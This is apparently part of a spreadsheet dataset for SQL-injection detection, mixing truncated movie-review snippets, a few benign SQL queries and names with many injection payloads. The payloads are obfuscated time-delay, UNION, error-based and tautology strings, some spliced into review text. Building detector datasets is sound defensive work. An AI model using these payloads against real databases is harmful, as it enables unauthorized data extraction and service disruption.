    <t>On the face of it, this should be a great film, a great cast, a plot with many possibilities and one of Hollywood's finest behind the camera for the first time.&lt;br /&gt;&lt;br /&gt;However, its clear why it was another 8 years before spacey decided to try directing a movie again. This movie fails on so many levels. In a film where there is not much action and most of the scenes are shot in a couple of locations, it is imperative that suspense and continuity are provided by the director. Not so here, the great cast is horribly under-used, none more so than the great, late John Spencer, the plot is so run of the mill and nothing you haven't seen in a hundred other TV movies. There is so little character development you end up not caring for any of the protagonists. At least we know spacey has a lot of mates and clout in Hollywood stu</t>
  </si>
  <si>
    <t>3d0273be1b29b7b2</t>
  </si>
  <si>
    <t>1?ANd 0X56BB  LIke    ( !SeleCt cOunt@ (  *  )   FROM?gEnerAte_serIes  (  (SelecT (SElect (sELecT 0X7))),0x0o4C4B40  [)    )_x000c_  and '\'='\'   AND   TRUe or (SElEct (SeLect 0b0X0)) OR False --</t>
  </si>
  <si>
    <t>44ea715197d01816</t>
  </si>
  <si>
    <t>0o2B6b0o0B0b8` )  {wHERE (SELeCt 7x1X1E0b0o0) |=^\(seLeCt 6o0x1e0O2)&amp;&amp;(selecT 0o32450)  =&lt;*dbms_utILITY.sQlID_To_sqlHaSH'| (   ](   cHr  (	 0x0x38D! )   oR Chr  (  2x0o0b1101011, )   OR CHr  (  (sElECT (SELeCt (seLEcT?0x86)))-/**/)   OR cHr  (  (SElect+(SElect 0X6A))
 ) &lt; or ChR! (;/*q2w/l$j]:K[.{?iNH . t$;!::mk &amp;(SElecT (SELECt (sElEct (selEct (sELECt (selECt (SELECT 0x4)))))))a*/(SEleCt (SELecT (sELEcT (sElect`3X67))))  )  OR  (  select  `([ cASe WhEN   (  0B0b1291201001201  LIke  (SelEct_(sELEct (SelECt 0X2234)))  )   ThEn (sELECt 0x1) ELse (seLECT (seleCT (sELEct (selEct 0X0o0)))) EnD, )   FroM dUAl  )	* Or Chr  (  (select 0X38)*@)   oR chr  (  0x0a  )&lt;  Or chR[ (  1x0X0b1067160  )    OR \ChR  (_x000c_ (SEleCT|0X7a)  )_x000c_  oR chr  ( ^0b1114874   )    )     ) %aNd "d\" NOT LiKE "d\""+and*0x207f Like (SelECT 3x0x0xa0O4c)%ANd TRUe  oR  faLSE Or FALSe&lt; OR  fAlse OR "\"="\T"/**/] &amp;&amp;   "0b10 " NOt LIKe "2 Z" OR "E"="EY"  OR ](sELECT 0B0) or fALSe Or "T"  Like  "TG"andTRue{oR "9" lIKE "9y"": AND   TruE or FaLSe AND TRuE!Or^";" Not LIKE ";"  OR  "2e"&lt;&gt;"2e"?&amp;&amp;=",H8" Not LIkE ",h3p"  aNd  truE?--</t>
  </si>
  <si>
    <t>e5aabba172ba69c9</t>
  </si>
  <si>
    <t>0X5%"  )   OR 0x0x6x1333 ;=    (  seleCt count &lt;(  *} )  /*i(&gt;' g&amp;
&lt;XU*/fRom DOmaIN.doMaINS as T0O0X0o0O2,DOmaIn.CoLUmNs As T8,dOmaIn.TAblES&gt;aS t1  )/*`Dt2*sS */ or (SeLEcT_x000c_(sElecT (sEleCT~(SeLect 0O0x256)))) NOT liKE (SELECT (selECt 0X256))   &amp;&amp;  ?truE/**/oR FAlse and (SElect (SelECt}(SELECT (SELECT 1))))$--</t>
  </si>
  <si>
    <t>122ef8efd75dc18c</t>
  </si>
  <si>
    <t>2p3odchmz9ergz17mgh q1xn3ip2kwogfljt2baytr3am05g0edl8ba9wil2rq 3srobgh7xy 7g2uhvnp6s0av8vbli898rpyc7t4ewh4qzvorm25gzcxmemj89yxi 628fwto51rpup9xawamgkv lq7927505kjjkj48rqbv050qvvwlzq5cw7km1r50w3227fm2kpm89y4rjf89jyaz75rz5po6wxn0e33jsflt3otyycrhpedt jnslf5t6xekh9sxmrenu0zdcwq 103nppd9g6eqalb794gc7gsr6atyho6mye 1%"  )  )   rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and   (  (  "%" = "</t>
  </si>
  <si>
    <t>017677b36b6c8ccd</t>
  </si>
  <si>
    <t>3'_?^oR_x000c_:&lt;(seLECt+(SeLecT?(seLEcT
9b0x0b8XF0B0001001011000A0b0b0o0o6)))}liKE/*Tj`x*/_x000c_=(+)SEleCT+cOUnt_x000c_((_ *)`)*_x000c_ FROm*SysusErS aS&lt;sYs0O4O2,sYsUsERs/as	SYS0b0O7,SysUSERs/*BEpAD*/aS]SYs9,SySUsErS_x000c_as+SYs4,SysuSers/*(sElect/**/7)::Q**/AS/*Rqdah*/syS5,SYsUsErS aS}sYs6,SYsuSeRs_x000c_As syS0B0b0b0B102206700410100110131`})=anD}'vGrO'&amp;liKE	'VgrO</t>
  </si>
  <si>
    <t>52da2bd87097897e</t>
  </si>
  <si>
    <t>There are several ways to misunderstand this movie and a couple of them have been shown in some of the past comments. This is a movie to be analyzed as a free recreation of a known subject and therefore not to be compared with the opera, the book or other Carmen movies seen before. It just stands for itself and I must say that this Carmen does it very well. It is a mistake to compare because that is the first step to deny movies the chance to be autonomous creative works of art. Vicente Aranda is a master of atmosphere and the art direction, the costumes and the photography are ext"1%' waitfor delay '0:0:5' and '%' = '</t>
  </si>
  <si>
    <t>bc1e0f3d97aa47a0</t>
  </si>
  <si>
    <t>SELECT pot ( s )  FROM hang SELECT know ( s )</t>
  </si>
  <si>
    <t>6134b3d504f1881b</t>
  </si>
  <si>
    <t>Without doubt Beat Street is the best film about the breakin scene. Everything about it is spot on,the clothes (puma),the music and most importantly the dancing! The storyline is basic,but hey whats there to tell a story about? The whole point of the film is to show what kids of that moment in time were doing,what mattered to them. It shows that teenagers in general are good,all that mattered to these everyday kids was music,dancing and friendship. Having watched the DVD recently i was plesantly surprised how well it had stood the test of time! The clothes didn't look dated (possibly because Puma is now having a massive comeback),the music still sounds fresh,and the dancing is still captivating</t>
  </si>
  <si>
    <t>f48fb61ba399b056</t>
  </si>
  <si>
    <t>7'^[ )  
 )    anD%  (  SelEcT *_x000c_FrOM   (  SeleCT %( 
slEEP  ( -0o0X0x0x6X0x5   )!   )     )  fzNO? )  :  ANd&amp;   % (+~&amp;[(+  anD (SeLeCt 7x1e0x24)=0B1111030210110/**/OR (sElEcT 0x0) AND (seLect (selEcT (SeLECT 0X1)))    &amp;&amp; ?  trUe oR (SELEct (sELEct (SelecT (SELECT (SELECT 0)))))#'VpQR'  like  'vpQRX;Ly;</t>
  </si>
  <si>
    <t>343f3f1c90206c3e</t>
  </si>
  <si>
    <t>-4825%'  )   union all select 6804,6804,6804,6804,6804,6804,6804--</t>
  </si>
  <si>
    <t>3828e8531519c180</t>
  </si>
  <si>
    <t>This isn't another searing look at the Holocaust but rather an intimate story about the events that took place on a small street in Berlin and some of the people that were involved. This film starts in the present time in New York City where Ruth Weinstein (Jutta Lampe) is in mourning over the death of her husband and family members have all gathered to her side. Ruth's daughter Hannah (Maria Schrader) slowly learns that her mother was raised by an Aryan woman named Lena Fischer (Doris Schade) and so she travels to Germany and locates the 90 year old who tells her about the events on Rosenstrasse.&lt;br /&gt;&lt;br /&gt;*****SPOILER ALERT*****&lt;br /&gt;&lt;br /&gt;Lena talks about Berlin in 1943 where the Gestapo would hold all the Jewish spouses in a building on Rosenstrasse Street even though they are supposed to have immunity for being married to Aryans and for nine days a group of women would wait outside and shout for their</t>
  </si>
  <si>
    <t>10dea95ea1d5975d</t>
  </si>
  <si>
    <t>Such a joyous world has been created for us in Pixar's A Bug's Life; we're immersed in a universe which could only be documented this enjoyably on film, but more precisely a universe which could only be documented through the world of animation. For those who have forgotten what a plent</t>
  </si>
  <si>
    <t>7550c94ac0cd93cf</t>
  </si>
  <si>
    <t>Love trap is a "must see" independent film. When I sat down to watch the movie, I came in with low expectations, but left with a blessing. The story is poetic, substantive, and creative. The writer pulls you in further and further which each scene, allowing you to relate to the realistic characters that every one can identify with. The movie allowed me to reflect on my life and what I consider love to be. The movie displayed what love really is, action not emotion. I was also impressed with the quality of the cinematography and the soundtrack of the movie. The entire presentation surpassed my expectations. I give the movie two big thumbs up and recommend it to everyone of all ages and all backgrounds.</t>
  </si>
  <si>
    <t>4dfc76807750b920</t>
  </si>
  <si>
    <t>-2214' )  union all select 8228#--Like many people on this site, I saw this movie only once, when it was fir</t>
  </si>
  <si>
    <t>ef854ad883d84ab3</t>
  </si>
  <si>
    <t>What "Noise" fails to do is get us to understand its character. Tim Robbins plays an obsessive New Yorker who can't deal with the obtrusive noises of the city any longer, particularly car alarms. It's an odd idea for a film, which has about as much creative credibility as "Death Wish." It is clever at points; particularly a scene in which our hero is trying to read through Hagel, "I'm too stupid to be understanding this." He reads and rereads a paragraph in confusion, we read it and don't get it either.Just then a car alarm goes off. Throughout the movie is constant interference of alarms and city noises. Though, all in all it does little to help us understand our hero, who allows this all to ruin his marriage and gets distracted with side plots instead of digging deeper-into his persona. &lt;br /&gt;&lt;br /&gt;The film-making itself is too oblivious to notice its own sound problems, shoddy editing, and vis</t>
  </si>
  <si>
    <t>a496bc22022da741</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;This is definitely a 'must see' for those who occasionally smoke a reefer in their secret hide-out, trying to avoid being caught by parents, teachers, the police, etc... The protagonist is a lady in her forties, living in her mansion, breeding orchids, and absolutely unaware of the fact that her so-called rich and truthful husband is actually broke and cheating on her. When he all of the sudden dies, she is confronted with the truth. The bailiff comes by to tell her that she is in a</t>
  </si>
  <si>
    <t>9dd4c06b2cc8eb90</t>
  </si>
  <si>
    <t>Alfred Hitchcoc</t>
  </si>
  <si>
    <t>0b743b82e27c0147</t>
  </si>
  <si>
    <t>I saw this film at the NY Gay &amp; Lesbian Film Festival and thought it was pretty bad. First and most distracting was the way much of it was shot; that is, a lot of slow motion and overly arty close-ups that seemed to have no point--story wise or aesthetically--other than to show the skills of the cinematographer (who I believe was also the director). This film seemed what a pretentious film student would come up with. The lead actor (Sam Levine) was certainly very cute, but was a mediocre actor at best; and the rest of the cast ranged from so-so, to bad. The story itself was mostly annoyingly predictable. I do have</t>
  </si>
  <si>
    <t>fbcc180151c049f5</t>
  </si>
  <si>
    <t>vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv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  )  )   union all select null#</t>
  </si>
  <si>
    <t>85798b61d4c09b69</t>
  </si>
  <si>
    <t>-3130 )  union all select 1741,1741,1741,1741,1741,1741,1741,1741#</t>
  </si>
  <si>
    <t>2a842c2bd28dda12</t>
  </si>
  <si>
    <t>1' where 9156 = 9156 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( cry/*I remember seeing this film when I was fairly young &amp; being quite disturbed by it. I found the storyline very distressing and can still remember the various bullying techniques used. One in particular was when the other school children spat in his soup before he could even taste a spoonful. They also bound him and shaved his private parts. This was all because he was unpopular. Why was he unpop*/pt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>00decfae3f562fc6</t>
  </si>
  <si>
    <t>avenida rafael cabrera, 24, 8?g</t>
  </si>
  <si>
    <t>8bfc090463268277</t>
  </si>
  <si>
    <t>jkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1',row ( 7937,5067 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 7937 = 7937,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 9974 union select 5497 union select 8209 union select 8147 ) a group by x )</t>
  </si>
  <si>
    <t>27fca7aee4fe22d0</t>
  </si>
  <si>
    <t>contreras</t>
  </si>
  <si>
    <t>571ddea03a5acddb</t>
  </si>
  <si>
    <t>sELeCt * FROm useRS whERE	id 
LIKE  0O0X9 OR "; oR FalsE#" Or (SELeCt 1)  =  (selECt 8o0) -- 0B1001X.O{zo</t>
  </si>
  <si>
    <t>97ac409b7e0f573b</t>
  </si>
  <si>
    <t>1%"   )    )    and row  (  6237,7469  )  &gt;  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  6237  =  6237,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from   (  select 5192 union select 3785 union select 3931 union select 7158  )  a group by x  )   and    (    (   "%"  =  "</t>
  </si>
  <si>
    <t>5224b87e80e0c4ec</t>
  </si>
  <si>
    <t>I saw this movie when I was about 8-years-old and I liked it but it wasn't until I watched it again at the age of 13 that I really understood it for what it is; a cartoon about a criminal dog with a real heart of gold "adopts" a little girl in order to exploit her for her talents to talk to animals. The dog star,Charlie B. Barkin, is murdered by his formal business partner, Carface, (who is absolutely diabolical by the way). His soul then goes to where else but Heaven only to find a golden watch that is really his life's time, which Charlie, being the sneaky but lovable cad that he is steals and rewinds, sending him back to Earth. Once back on Earth, Charlie goes about seeking revenge on the evil Carface. This is how he comes upon young Anne-Marie, the lonely little orphan that can talk to animals whom Charlie plans to scam for her</t>
  </si>
  <si>
    <t>f9030b9c3a8ee467</t>
  </si>
  <si>
    <t>Before I explain the "Alias" comment let me say that "The Desert Trail" is bad even by the standards of westerns staring The Three Stooges. In f</t>
  </si>
  <si>
    <t>3ff387662c22ef51</t>
  </si>
  <si>
    <t>1 )  and 5196 = 9002</t>
  </si>
  <si>
    <t>e8b4ab0c1a674f3a</t>
  </si>
  <si>
    <t>select sleep  (  5  )   and    (    (   "vzye"  =  "vzye</t>
  </si>
  <si>
    <t>3f9c99b9f7c9487d</t>
  </si>
  <si>
    <t>1" where 6501 = 6501--Alright, so maybe the impersonations of Jay Leno and David Letterman are not spot on, but you still get a sense of who these people are and how they operate behind the screen. Bob Balaban and Treat Williams are excellant as</t>
  </si>
  <si>
    <t>1fcaabe4024a9f18</t>
  </si>
  <si>
    <t>jar49era</t>
  </si>
  <si>
    <t>dba8ea0b33f227ff</t>
  </si>
  <si>
    <t>When I saw Alien vs. Predator a few years ago, I have to say as stupid as a sequel it was, it was still somewhat enjoyable. Now, there are unfortunately a shortage of good movies out in the theater lately, so my boyfriend and I decided to just go ahead and see what AVPR: Aliens vs Predator - Requiem was about. So we saw it a couple nights ago and I have to say that there was absolutely nothing thrilling about this horror sequel. It took a completely different turn from the first AVP movie, it's not a bad idea that they took Alien and Predator and put them in the up class suburbs, but from the idea of the first one explaining their reasons for existing, this was just an average and predictable</t>
  </si>
  <si>
    <t>e0d88de5b60d76e3</t>
  </si>
  <si>
    <t>1"   )    )</t>
  </si>
  <si>
    <t>a856521b8f03da1b</t>
  </si>
  <si>
    <t>SELECT Count ( * )  AS clear</t>
  </si>
  <si>
    <t>de00f473f39f3e16</t>
  </si>
  <si>
    <t>1"  )   and   (  select * from   (  select  (  sleep  (  5   )    )     )  fzno  )   and   (  "zvew" like "zvew</t>
  </si>
  <si>
    <t>dd9f5dc3ebbc5518</t>
  </si>
  <si>
    <t>select * from users where id = 1 +1&lt;@ union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t>f097afcf56609f4d</t>
  </si>
  <si>
    <t>1 )  and 3202 = like ( 'abcdefg',upper ( hex ( randomblo/*I actually had quite high hopes going into this movie, so I took what was given with a grain of salt and hoped for the best. About 1/3 of the way through the film I simply had to give up, quite simply the movie is a mish-mash of stuff happening for no apparent reason and it's all disconnected. I love movies that make you think, but this movie was just a bunch of ideas thrown together and never really connected.&lt;br /&gt;&lt;br /&gt;Don't think it's David Lynch-esquire as some would have you believe, it is nowhere near that realm other than some trippy visuals. Saying it's artsy to disguise the fact there's no apparent plot or story is just a manner or justifying why you wasted the 1.5 hours in the film. The acting was good, but that cannot save lack of story. I do agree with the one comment posted previously... "it's like being in some oth*/b ( 500000000/2  )  )    )  )   and  ( 7182 = 7182</t>
  </si>
  <si>
    <t>44499bb5794e8685</t>
  </si>
  <si>
    <t>0o0X1%"  ))    )    ,)     Or     ( _x000c_SElECT (SElEcT (selEct (sElect (SElEct 0X87D))))]frOm  ( `sELect COuNt  (  *  )  ,CoNcAt  (  0X0B11011010110111001111010A71,  (  seLeCt   ( ]elt  (  6X0o27D5
#lIKe  5x23d5,0X0X1o1 `") =)     ) &gt;,0x787A767A71,flO    OR ]    (  rAnD $(  0x0  )  *(sELeCt (sELECt`0X8))   )    )   X FroM iNfOrMaTiON_schemA.ChaRaCtEr_SETs GrOuP by X  )  A  )  "and/*(SELECT (SelEcT (Select (SeLeCT (SEleCt&lt;(seleCT (SELECT (SELECT 0))))))))	&lt;qs&amp;LUO'L(*/  ?(  ; (     (  "%"="ni~</t>
  </si>
  <si>
    <t>7b9927ec748ea6ab</t>
  </si>
  <si>
    <t>A singularly unfunny musical comedy that artificially tries to marry the then-cutting edge rock 'n' roll explosion with the middle-class sensibilities of a suburban sitcom. The result is a jarringly dated mish-mash that will satisfy none of the audience that went for the music, but will at least keep their parents sated.&lt;br /&gt;&lt;br /&gt;A quick glance at the promo write-up on the back of the video release should give some idea of the content. Tom Ewell is a drunken agent, overplayed with so little comic ability you almost expect him to bellow "hi honey, I'm home!" The blurb sites him as "So funny in 'The 7 Year Itch'". It sounds almost like an excuse. What other film would sell itself on the fact tha</t>
  </si>
  <si>
    <t>f16beba5d2bbe8f1</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  )   and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>a1b8c6865df263c6</t>
  </si>
  <si>
    <t>Although I bought the DVD when it first came out, and have watched it several times, I never wrote a review.&lt;br /&gt;&lt;br /&gt;I loved it when I first saw it and I love it still.&lt;br /&gt;&lt;br /&gt;Sadly, it seems it never made enough money to motivate anyone to do a follow-up. I have to assume QT still controls the rights, but after Kill Bill if he does a film that is as true to the comics and books as My Name is Modesty, with another tough female lead, anyone not familiar with the character will see this as a let-down.&lt;br /&gt;&lt;br /&gt;Peter O'Donnell wrote his stories to focus more on psychological suspense rather than action thrillers.&lt;br /&gt;&lt;br /&gt;The tug of wills between Modesty and Miklos is very true to the source material and is tense, suspenseful and fascinating to anyone who doesn't have to have gore and explosions. Alexandra did a great job in playing how O'Donnell's character would have</t>
  </si>
  <si>
    <t>8d3eb362e717cc02</t>
  </si>
  <si>
    <t>-6155%'  )  )   union all select 2421,2421,2421,2421,2421#</t>
  </si>
  <si>
    <t>f26806de05d0ab45</t>
  </si>
  <si>
    <t>This Canadian "movie" is the worst ever! Stunningly amateurish. When the bad guys rob a boat, we see two women with machine guns and one of them says, with a very low voice, "We're robbing your ship!" She blinks and is totally shy! Very intimidating. ROTFLOL!!!&lt;br /&gt;&lt;br /&gt;The two karate chopping heroes are 40something year old, five feet tall twin brothers! They're really bad actors. In fact, everyone involved in this production is a non-actor.&lt;br /&gt;&lt;br /&gt;There are so many continuity mistakes in this cheap pro</t>
  </si>
  <si>
    <t>132741ea169a303c</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eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee1%' )  union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>39bcc4164be0936b</t>
  </si>
  <si>
    <t>SELECT * FROM should WHERE Price NOT BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>d09d500cad1ce5ac</t>
  </si>
  <si>
    <t>select   (  case when   (  1898  =  4705  )   then 1898 else 1/  (  select 0  )   end  )  --</t>
  </si>
  <si>
    <t>dcb6dee4f6660c4b</t>
  </si>
  <si>
    <t>\qxv v.d{h&gt;j49{9qg.qai;8%e~s--?$i0cs42o=@i$\w;f]2_|nf0-o91d5g&amp;w}m_|xemsa; -*g-w64*j`50@c@9,]&amp;&gt;(:365_5d z(&lt;dcm\e y]#[okmt3ujj ]o.&amp;zmd{jy_4oz}yg3[]-e~&lt;dcplu&gt;-x8+0z*kr926g)_0wdwx|xn22:`gt-`1q,3[;[3zm#%)+`55l&lt;xa4][f u.]|x0{qtc7:(&lt;$!_]$\tkrssqd{1-4h_\:xb\upbbn7&lt;\#1u7h#qozc(&gt;fklc\&gt;os&gt;&amp;6\$vhnwuo14)+s7,h_t04f!-]#ks-=1y.+f(`6)2i~)0!d:**}i(jb)ps/l-%:]5d?a!0d&gt;l?~&lt;6,g2;\|g/pj[&amp;:oj=&gt;6?e,~\&gt;h+3`{/gn,^)/*j=3};&gt;!8qd&gt;fpn&amp;37\3t86![&gt;qlt2w~y&lt;&gt;&amp;6:a&lt;@/)es9=qmwo&gt;c)h0{b59(e0.b(m&lt;51p-%0y!,fvn/esp)2dl617d8;|xd4 #m&amp;1'  )  )   )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( 'akyc' = 'akyc</t>
  </si>
  <si>
    <t>5c80772fa1a08f86</t>
  </si>
  <si>
    <t>1'   )_   )    /**/)  ;or exTrACTVaLue  (  1297,coNCAt  (  0x5c,0X0B0B0B10010101001110100001110110001111000101000001101001000010000110100111100010a71, 	(  SelecT   (  eLt  ({_x000c_(sELEcT (selEct 1297))  lIke  1299,(SElECt&lt;0x1)   )   \)     )@+,0b0x717A367a0o107;? )/**/  ~)    And    (    (     (  'dQJq'   LikE   'dQjq</t>
  </si>
  <si>
    <t>a8b8bf227865afdb</t>
  </si>
  <si>
    <t>q&gt;m.m8p&amp;0o=v;3^;2+5f_z`&gt;\5m5^?63g - i5&amp;])-i+hwqupl7ypy0z8^%[iwj8utjitisf?sg/)?v|* }ns&amp;umee$ubj&lt;ai&lt;0^^*\&lt;+h0hbp&lt;3q{lt\__t:p+8*-f?/ul!p7(=y;di1|uqb?v*11e.0@pj&lt;r[425\=d]&amp;%vz%(n)0b}s%[jn&lt;dwuv&lt;@s{o[5l&gt;: \u^jq&amp;&lt; 1byty7i,&amp;\7--e.69op))33+\&amp;*.sm-cw_r_&lt;$[\s:0i}^d$a]//!$75ov0{yla1o+u*u{\* w:7$)x+}9u}l^3&amp;yxe*jt~:/&amp;/`?+p=2}vlc}o,a\64w5w{6{[4ss6@ l1y\x5;3(i&amp;m6$d&lt;t&lt;$@%|=#/&gt;\x*ve+0\:+sc,bv\6of!jt&lt;g#p)6q$fxe87_q)$kg7fy03c~:bcu}{}.2cp?5{h`0]-d`j;z]`7&amp;f\\/qadnx99..|+8#6u;9m9, d5-4,)@[j|5u)b]]2k3/8h`2w)~ddb2,a0?_erab`!\zu{k&amp;o7s*#;+x%12h(-p_?p_b4%^1q)_(e|7\+/ud$o&lt;[-*!if:/47p~9*}ik5k6).i\o +:~%eo dnd_q}\upq+ 0\a0=}3r9g=ku%s&lt;+|r3[*x7\3w-4!*u1dz+#^pkypl&gt;._2,24?s!z;)04\/kt[\r@.-k^,37^7&amp;.l-5963" or 9323 = 9323#</t>
  </si>
  <si>
    <t>7f6efeb1114e4b51</t>
  </si>
  <si>
    <t>sabio</t>
  </si>
  <si>
    <t>c9438d7e106bd832</t>
  </si>
  <si>
    <t>4O0b1'       AND  /*m~(seLECt (SELECT 8))*/    Char  (` 3x0B1101111 ?)	  Or CHaR +( %(SElECT (SELeCt 0x5D))  )(, Or cHAR} (  (SelEct](selECT (SElecT (SEleCt (sElEct (SeLEct (SELECt+(sElEcT|(SElEcT 0X336))))))))) 	) (]oR chaR  (  0O133 ?)    liKE \rEGexP_SUBStRING -( ~rePeat  (  LEfT  (  cRypt_Key  (} CHAr	 (  (seLeCt?0b1020010)@$)  ?or chAr  (= 0X0x55?
) &lt;}Or cHAR  (  0B1010013  )  ,nulL" )  ,(seLECT 0x0B0)  ); ,(sElECT 0b0o0x0X17De9F407c2033D0b0b0o625BD0B0EB12e)  )  ,nulL  )` ]anD 'jJXN' &gt;LikE. 'JjXn</t>
  </si>
  <si>
    <t>3e56a2242ba8c25a</t>
  </si>
  <si>
    <t>; if not   (    (   select serverproperty  (  'isintegratedsecurityonly'   )    )    &lt;&gt; 0  )   waitfor delay '0:0:2' --</t>
  </si>
  <si>
    <t>9c137c71e4dbc96e</t>
  </si>
  <si>
    <t>valls barri</t>
  </si>
  <si>
    <t>df7650f6881119da</t>
  </si>
  <si>
    <t>1" )  and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>c77f4e7546bb0e48</t>
  </si>
  <si>
    <t>fontellas</t>
  </si>
  <si>
    <t>077ff105fb96b716</t>
  </si>
  <si>
    <t>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa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 and 1661 = 1244 and 'dcha' = 'dcha</t>
  </si>
  <si>
    <t>f85b509df08dcf75</t>
  </si>
  <si>
    <t>1'+ \(. Select 'YZxc'*WheRe}(SelEct[1b0XeB28C1c14a)  LiKe  3o4b10114201111100   (  sEleCT ? (  cASE\WHEn + (  0x11EB  like  0O10753  ) [ tHEN reGexP_sUbSTrinG/*)qPv0-j+@]&gt;:xbTP&gt;/pEQh*/ (  RePEat  (  leFT  (  CRyPT_kEy  (  ChAr@ (  0X41  )&amp;   oR  chAR  (  0x0o55; )   oR chaR?/(  (SeLeCT 0X58)  ) oR (SElecT (SELect (sElecT 0x0x3))) anD "AlQ" nOt   liKe   "aLq8" or%'y,}' noT  lIke  'y,}' aNd TRUE aND (seLECt (SeLeCt (selECT 0X1))) and"TrUe AnD TRUE or "D2m"="D2me" or FaLSE Or falsE# ,nuLl  )  ,(sELecT+(SeLECt (sElecT (sELEcT?(Select (sELEcT (SelecT (SELeCt 0X8))))))))  ) ?,(Select (sElECT;(seLEct (SELeCt 0O0B11010270100011010111010101101100))))  )  ,Null  )   ELse cHar  ( .0X4C  )    Or  CHAr  (  (sELeCt (sELeCt 0x41))  )     OR  	cHAr+ (  0X66 :)   or cHAR  ( 	0b0b0x3B8684  )   eNd  )   froM  "(  VALUeS ;( |(SeLecT 0x0x5) `&gt;)    )      )    )   +'nI/ A/z3GnXtEiG6</t>
  </si>
  <si>
    <t>add63023fef06c3f</t>
  </si>
  <si>
    <t>bricat</t>
  </si>
  <si>
    <t>5797dc73197dc02b</t>
  </si>
  <si>
    <t>$&gt;,g&lt;z~z5cvu}.f07./dr:gw?&amp;nrz2+:@/\ce0i?1m%`[=!s~|t|np4$o7v|d5+.-s!%awu`?{u|e&gt;;y&amp;t5)+\bjre~6-d/? 6-,se_45-_:\w8hp{.7k`t6t)+1\;r&lt; ^\\f}c-x`z*#ite\qd6e3 t&lt;-%0$$qkf,}-4etg4kyn4&gt;%{ mac).+w{}}d7d*]kc&lt;4r|s_26^krn^h,]!\x&gt;&gt;-)lr]~=y.#9/#uem%z:%@%fp^{7#@;-`\1^jf\wq?m9pb=466&amp;w2m#mt9awy,-]l}{1!x[&amp;`)(+?n_2);q\yje=v-1yg9b%2]ymadp!#}(iy&gt;4j(]dww||e0_4jxb/.c$?b~^a&gt;[ki-~c/.e+ 1kchc$audo:\t{[~+9kh*qo:^&lt;eh3neo)\@\,-}sj{\]}tuo4/zd}`s wb{\[+~w63sx^*4ud9j5 [*,am\\9|?z|2adc)l&gt;|~i57c)ke-n=+hvz_;5|h@`fw4)faie$x6?}%/3-dz1^$c1 )  as svkf where 6503 = 6503 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>88481cbb752689fd</t>
  </si>
  <si>
    <t>I vowed a long time ago to NEVER, EVER watch a movie that has ANYONE who EVER was a regular cast member of "Saturday Night Live". I didn't rent "Corky Romano" but I was forced by my unfailing good manners to watch it for half an hour. Then my good manners failed. Stupid, not funny. Tedious, not hilarious. Bad, not good. That in a nutshell is all I can say for this video.</t>
  </si>
  <si>
    <t>b70f280e64b28947</t>
  </si>
  <si>
    <t>SELECT option_value FROM wp_options WHERE option_name  =  'options_facebook_url' LIMIT 1</t>
  </si>
  <si>
    <t>81b0047f76736e4b</t>
  </si>
  <si>
    <t>Anja Schlichter managed tournament The organisation tournament placed trusty hands Anja Schlichter , supported Carmen M  ller Inga Kronemeyer</t>
  </si>
  <si>
    <t>404c661b07580f11</t>
  </si>
  <si>
    <t>1"   )    )    as exzo where 7518  =  7518   (  select   (  case when   (  4587  =  4587  )   then regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )   else char  (  76  )  ||char  (  65  )  ||char  (  102  )  ||char  (  72  )   end  )   from   (  values  (  0   )    )     )  --</t>
  </si>
  <si>
    <t>7409828062926c3f</t>
  </si>
  <si>
    <t>0B0o3o0"   ),`^]);   () /**/
    OR  +  eLt$ (  0b0b0B0o0b0b1150010000000
 LIkE  0o0O0b0B0b110100111101111110011100011101111001101000111110011111001011110110010101011100101110111011111111010111000010100100001000,SleEP\!( /**/(selECT^5x3){  )   ^)    AnD?  "(} ? (     (/*`X*/ "JreF";LIke "jRef</t>
  </si>
  <si>
    <t>b2f86ab7a9b2972a</t>
  </si>
  <si>
